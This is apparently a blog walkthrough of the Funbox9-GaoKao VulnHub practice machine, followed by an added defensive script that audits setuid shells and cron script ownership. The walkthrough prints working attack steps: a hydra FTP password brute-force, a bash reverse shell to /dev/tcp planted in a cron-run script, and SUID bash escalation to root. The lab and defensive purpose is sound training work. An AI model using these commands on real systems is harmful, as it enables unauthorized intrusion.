Target Machine Pentest Practice 30: Funbox9-GaoKao

独兜曲 2022-04-18 34 reads
Web security

Target description

Target URL: https://www.vulnhub.com/entry/funbox-gaokao,707/

1. Setting up the target environment

Attack machine: Kali

Target machine

Note: the target and Kali only need to be on the same LAN (same subnet, i.e. both VMs use the same network mode).

The target environment is set up as follows.

2. Hands-on

2.1 Network scanning

2.1.1 Start the target and Kali, then scan

Method 1: arp-scan -I eth0 -l (scan from a specified interface)

arp-scan -I eth0 -l

☁  kali  arp-scan -I eth0 -l                                                                                                                           
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2     08:00:27:ce:b3:82       PCS Systemtechnik GmbH
192.168.9.48    08:00:27:84:5a:6f       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.942 seconds (131.82 hosts/sec). 2 responded
☁  kali 
Method 2: masscan <subnet to scan> -p <ports to scan>

masscan 192.168.184.0/24 -p 80,22

Method 3: netdiscover -i <interface> -r <subnet>

netdiscover -i eth0 -r 192.168.184.0/24

Method 4: left for readers to add

2.1.2 Checking the target's open ports

Use nmap -A -sV -T4 -p- <target ip> to list the target's open ports:

☁  kali  nmap -A -sV -T4 -p- 192.168.9.48
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 14:56 CST
Nmap scan report for 192.168.9.48
Host is up (0.00038s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 ftp      ftp           169 Jun  5  2021 welcome.msg
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 48:39:31:22:fb:c2:03:44:a7:4e:c0:fa:b8:ad:2f:96 (RSA)
|   256 70:a7:74:5e:a3:79:60:28:1a:45:4c:ab:5c:e7:87:ad (ECDSA)
|_  256 9c:35:ce:f6:59:66:7f:ae:c4:d1:21:16:d5:aa:56:71 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Wellcome to Funbox: Gaokao !
|_http-server-header: Apache/2.4.29 (Ubuntu)
3306/tcp open  mysql   MySQL 5.7.34-0ubuntu0.18.04.1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.34-0ubuntu0.18.04.1
|   Thread ID: 4
|   Capabilities flags: 65535
|   Some Capabilities: IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, ConnectWithDatabase, LongPassword, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, Support41Auth, LongColumnFlag, IgnoreSigpipes, FoundRows, InteractiveClient, SupportsTransactions, SupportsLoadDataLocal, SupportsCompression, ODBCClient, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: HPU~~D\x17\x01a&,\x15;\x18\x17\x0Ef\x7F'|
|_  Auth Plugin Name: mysql_native_password
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_5.7.34_Auto_Generated_Server_Certificate
| Not valid before: 2021-06-05T15:15:30
|_Not valid after:  2031-06-03T15:15:30
MAC Address: 08:00:27:84:5A:6F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.38 ms 192.168.9.48

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.30 seconds

21—ftp—ProFTPD 1.3.5e—Anonymous FTP login allowed (FTP code 230)

22—ssh—OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80—http—Apache httpd 2.4.29 ((Ubuntu))

3306—mysql—MySQL 5.7.34-0ubuntu0.18.04.1

2.2 Enumerating vulnerabilities

2.2.1 Port 21 analysis

Since the FTP server allows anonymous login:

☁  FunBox9  ftp 192.168.9.48                 
Connected to 192.168.9.48.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.9.48]
Name (192.168.9.48:hirak0): anonymous 
331 Anonymous login ok, send your complete email address as your password
Password: 
230-Welcome, archive user anonymous@192.168.9.7 !
230-
230-The local time is: Thu Mar 17 07:24:26 2022
230-
230-This is an experimental FTP server.  If you have any unusual problems,
230-please report them via e-mail to <sky@funbox9>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

The banner reveals a username: sky@funbox9

2.2.2 Port 22 analysis

Usually only brute force is an option here, and there is no suitable wordlist for now.

2.2.3 Port 80 analysis

2.3 Exploitation

2.3.1 Getting a shell by modifying the cron job script

Brute-force sky's password with hydra:

hydra -l sky -P /usr/share/wordlists/rockyou.txt 192.168.9.48 ftp

☁  FunBox9  hydra -l sky -P /usr/share/wordlists/rockyou.txt 192.168.9.48 ftp
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-17 15:26:17
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.9.48:21/
[STATUS] 373.00 tries/min, 373 tries in 00:01h, 14344026 to do in 640:56h, 16 active
[21][ftp] host: 192.168.9.48   login: sky   password: thebest
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-17 15:28:39

Credentials obtained: sky:thebest

Since Kali's default ftp client is not very user-friendly, lftp is used here:

☁  FunBox9  lftp -u sky,thebest 192.168.9.48
lftp sky@192.168.9.48:~> ls
-rwxr-x---   1 sky      sarah          66 Jun  6  2021 user.flag
lftp sky@192.168.9.48:~> ls -al
drwxr-xr-x   3 sky      sky          4096 Jun  6  2021 .
drwxr-xr-x   5 root     root         4096 Jun  5  2021 ..
-rw-------   1 sky      sky            56 Jun  5  2021 .bash_history
-r--r--r--   1 sky      sky           220 Jun  5  2021 .bash_logout
-r--r--r--   1 sky      sky          3771 Jun  5  2021 .bashrc
-r--r--r--   1 sky      sky           807 Jun  5  2021 .profile
drwxr-----   2 root     root         4096 Jun  5  2021 .ssh
-rwxr-x---   1 sky      sarah          66 Jun  6  2021 user.flag
-rw-------   1 sky      sky          1489 Jun  5  2021 .viminfo
lftp sky@192.168.9.48:~> cat user.flag
#!/bin/sh
echo "Your flag is:88jjggzzZhjJjkOIiu76TggHjoOIZTDsDSd"
68 bytes transferred
lftp sky@192.168.9.48:~> 

We can see that the flag file is a shell script, and that the file is executable by user sarah (group sarah has r-x). So we can guess that there is a cron job run by sarah that executes it. Therefore I download the file to my local machine, update the script, and upload it back to the FTP server.

lftp sky@192.168.9.48:~> put user.flag
52 bytes transferred
lftp sky@192.168.9.48:~> ls -al
drwxr-xr-x   3 sky      sky          4096 Jun  6  2021 .
drwxr-xr-x   5 root     root         4096 Jun  5  2021 ..
-rw-------   1 sky      sky            56 Jun  5  2021 .bash_history
-r--r--r--   1 sky      sky           220 Jun  5  2021 .bash_logout
-r--r--r--   1 sky      sky          3771 Jun  5  2021 .bashrc
-r--r--r--   1 sky      sky           807 Jun  5  2021 .profile
drwxr-----   2 root     root         4096 Jun  5  2021 .ssh
-rwxr-x---   1 sky      sarah          52 Mar 17 07:41 user.flag
-rw-------   1 sky      sky          1489 Jun  5  2021 .viminfo
lftp sky@192.168.9.48:~> cat user.flag
#!/bin/sh
bash -i >& /dev/tcp/192.168.9.7/6666 0>&1
54 bytes transferred
lftp sky@192.168.9.48:~> 

Listen on Kali with nc -lvp 6666, and the shell comes back:

☁  FunBox9  nc -lvp 6666
listening on [any] 6666 ...
192.168.9.48: inverse host lookup failed: Host name lookup failure
connect to [192.168.9.7] from (UNKNOWN) [192.168.9.48] 53418
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$ id
id
uid=1002(sarah) gid=1002(sarah) groups=1002(sarah)
bash-4.4$ 

Upgrade the shell with Python: python -c 'import pty;pty.spawn("/bin/bash")'

However, the Python method did not get me a PTY shell, so I found the following approach instead:

SHELL=/bin/bash script -q /dev/null

2.4 Privilege escalation

2.4.1 Information gathering

Next, while searching for SUID binaries, I found that bash has the setuid bit set:

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

bash-4.4$ find / -perm -4000 -exec ls -al {} \; 2>/dev/null
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
-rwsr-sr-x 1 root root 1113504 Jun  6  2019 /bin/bash
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping
-rwsr-xr-x 1 root root 43088 Sep 16  2020 /bin/mount
-rwsr-xr-x 1 root root 26696 Sep 16  2020 /bin/umount
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 18448 Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 149080 Jan 19  2021 /usr/bin/sudo
-rwsr-sr-x 1 root mail 96648 Nov 16  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 37136 Mar 22  2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 37136 Mar 22  2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
-rwsr-sr-x 1 daemon daemon 51464 Feb 20  2018 /usr/bin/at
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 113528 Feb  2  2021 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42992 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
bash-4.4$ 

Looking up /bin/bash on https://gtfobins.github.io:


We escalate privileges via the SUID bit.

Run bash -p, then go into the root directory and find root.flag:

bash-4.4$ bash -p
bash -p
bash-4.4# id
id
uid=1002(sarah) gid=1002(sarah) euid=0(root) egid=0(root) groups=0(root),1002(sarah)
bash-4.4# cd /root
cd /root
bash-4.4# ls -al
ls -al
total 28
drwx------  4 root root 4096 Jun  6  2021 .
drwxr-xr-x 24 root root 4096 Jun  5  2021 ..
-rw-------  1 root root    0 Jun  6  2021 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root 2289 Jun  5  2021 root.flag
drwx------  2 root root 4096 Jun  5  2021 .ssh
drwxr-xr-x  2 root root 4096 Jun  5  2021 .vim
-rw-------  1 root root    0 Jun  6  2021 .viminfo
bash-4.4# cat root.flag
cat root.flag


  █████▒█    ██  ███▄    █  ▄▄▄▄    ▒█████  ▒██   ██▒     ▄████  ▄▄▄       ▒█████   ██ ▄█▀▄▄▄       ▒█████  
▓██   ▒ ██  ▓██▒ ██ ▀█   █ ▓█████▄ ▒██▒  ██▒▒▒ █ █ ▒░    ██▒ ▀█▒▒████▄    ▒██▒  ██▒ ██▄█▒▒████▄    ▒██▒  ██▒
▒████ ░▓██  ▒██░▓██  ▀█ ██▒▒██▒ ▄██▒██░  ██▒░░  █   ░   ▒██░▄▄▄░▒██  ▀█▄  ▒██░  ██▒▓███▄░▒██  ▀█▄  ▒██░  ██▒
░▓█▒  ░▓▓█  ░██░▓██▒  ▐▌██▒▒██░█▀  ▒██   ██░ ░ █ █ ▒    ░▓█  ██▓░██▄▄▄▄██ ▒██   ██░▓██ █▄░██▄▄▄▄██ ▒██   ██░
░▒█░   ▒▒█████▓ ▒██░   ▓██░░▓█  ▀█▓░ ████▓▒░▒██▒ ▒██▒   ░▒▓███▀▒ ▓█   ▓██▒░ ████▓▒░▒██▒ █▄▓█   ▓██▒░ ████▓▒░
 ▒ ░   ░▒▓▒ ▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░ ▒░▒░▒░ ▒▒ ░ ░▓ ░    ░▒   ▒  ▒▒   ▓▒█░░ ▒░▒░▒░ ▒ ▒▒ ▓▒▒▒   ▓▒█░░ ▒░▒░▒░ 
 ░     ░░▒░ ░ ░ ░ ░░   ░ ▒░▒░▒   ░   ░ ▒ ▒░ ░░   ░▒ ░     ░   ░   ▒   ▒▒ ░  ░ ▒ ▒░ ░ ░▒ ▒░ ▒   ▒▒ ░  ░ ▒ ▒░ 
 ░ ░    ░░░ ░ ░    ░   ░ ░  ░    ░ ░ ░ ░ ▒   ░    ░     ░ ░   ░   ░   ▒   ░ ░ ░ ▒  ░ ░░ ░  ░   ▒   ░ ░ ░ ▒  
          ░              ░  ░          ░ ░   ░    ░           ░       ░  ░    ░ ░  ░  ░        ░  ░    ░ ░  
                                 ░                                                                          

You did it ! 
THX for playing Funbox: GAOKAO !

I look forward to see this screenshot on twitter: @0815R2d2
bash-4.4# 
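Two defender-side checks for the weaknesses this box relies on (a cron script that a different account can rewrite, and a setuid-root shell), as an added example that is not part of the original post. The listing lines it parses are constructed from the output shown above; audit_suid, check_cron_script and the RISKY_BASENAMES list are my own names.

```shell
#!/bin/sh
# Added example (not from the original post): two defender-side checks for the
# weaknesses used above; sample listing lines are constructed from the page's output.

# Shells/interpreters that should never be setuid-root: bash -p hands euid 0 to the caller.
RISKY_BASENAMES='bash sh dash zsh ksh python python3 perl ruby vim vi find'

# audit_suid: read an `ls -l` style listing on stdin; print
# "<path> setuid-root interpreter/shell" for each root-owned setuid entry in RISKY_BASENAMES.
audit_suid() {
    while read -r mode _links owner _group _size _mon _day _yr path; do
        case "$mode" in
            -??[sS]*) ;;                    # setuid bit present in the owner triplet
            *) continue ;;
        esac
        [ "$owner" = root ] || continue
        base=${path##*/}
        for r in $RISKY_BASENAMES; do
            if [ "$base" = "$r" ]; then printf '%s setuid-root interpreter/shell\n' "$path"; fi
        done
    done
}

# check_cron_script: $1 is the user the cron job runs as, stdin one `ls -l` line for the
# script; flag the user.flag case (a different non-root account owns, hence can rewrite, it).
check_cron_script() {
    runner=$1
    read -r mode _links owner _rest || return 1
    case "$mode" in
        ?????w*|????????w*) echo "FLAG group-or-world-writable"; return 0 ;;
    esac
    if [ "$owner" != "$runner" ] && [ "$owner" != root ]; then
        echo "FLAG owned-by-$owner-but-run-as-$runner"; return 0
    fi
    echo "OK"
}

# Constructed sample input (values copied from the listings on this page).
SUID_SAMPLE='-rwsr-sr-x 1 root root 1113504 Jun  6  2019 /bin/bash
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root 149080 Jan 19  2021 /usr/bin/sudo
-rwsr-sr-x 1 daemon daemon 51464 Feb 20  2018 /usr/bin/at'
CRON_SAMPLE='-rwxr-x---   1 sky      sarah          66 Jun  6  2021 user.flag'

# count_suid_findings: number of flagged entries in SUID_SAMPLE.
count_suid_findings() { printf '%s\n' "$SUID_SAMPLE" | audit_suid | wc -l | tr -d ' '; }

printf '%s\n' "$SUID_SAMPLE" | audit_suid                 # /bin/bash setuid-root interpreter/shell
printf '%s\n' "$CRON_SAMPLE" | check_cron_script sarah    # FLAG owned-by-sky-but-run-as-sarah
```

The fix for the flagged entries on this box is to clear the bit with chmod u-s /bin/bash and to make the cron script owned and writable only by the account (or root) that the job runs as.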

Summary

This box once again relies on information gathering via FTP, then modifying the cron job script to get a shell, and finally SUID privilege escalation to obtain the flag.

  1. Brute-forcing FTP with hydra
  2. Information gathering
  3. SUID privilege escalation